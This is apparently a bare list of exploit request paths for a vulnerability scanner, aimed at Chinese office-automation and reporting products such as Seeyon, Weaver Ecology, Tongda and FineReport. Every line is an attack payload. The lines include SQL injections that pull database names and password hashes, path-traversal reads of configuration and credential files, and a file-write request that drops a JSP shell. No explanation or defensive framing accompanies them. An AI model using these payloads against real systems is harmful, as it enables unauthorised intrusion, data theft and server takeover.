/data/sys-common/treexml.tmpl
/seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/debugggg.jsp&fileId=2
/login/VerifyGDLogin.jsp?para1=1&para2=2
/api/encrypt/secondauthsetting/saveCAAuth
/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/CRMtable/PublicPage/CustomerLogin.aspx?id=1%27%20AND%201840%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%20FROM%20master..sysdatabases%20WHERE%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20NOT%20IN%20%28SELECT%20TOP%202%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20master..sysdatabases%20ORDER%20BY%20name%29%20ORDER%20BY%20name%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29--%20OlrO
/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes(
/Api/portal/elementEcodeAddon/getSqlData?sql=
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(
/mysql_config.ini
/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27
/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp
/UserSelect/
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))
/mainpage/msg.aspx?user=1
/mainpage/msglog.aspx?user=1
/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../
/system/mediafile/templateOfTaohong_manager.jsp?path=/../../
/system/mediafile/templateOfTaohong_manager.jsp?path=/../
/system/mediafile/templateOfTaohong_manager.jsp?path=/
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
/seeyon/main.do?method=officeDown&filename={{filepath}}
/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true
/interface/auth.php?&PASSWORD=1&USER_ID=%df%27 and (select 1 from (select count(*),concat((select concat(0x3a,(select database()) ,0x3a) from user limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
/interface/ugo.php?OA_USER=a%2527%20and%201=(select%201%20from(select%20count(*),concat((select%20database()),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/defaultroot/evoInterfaceServlet?paramType=user
/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))
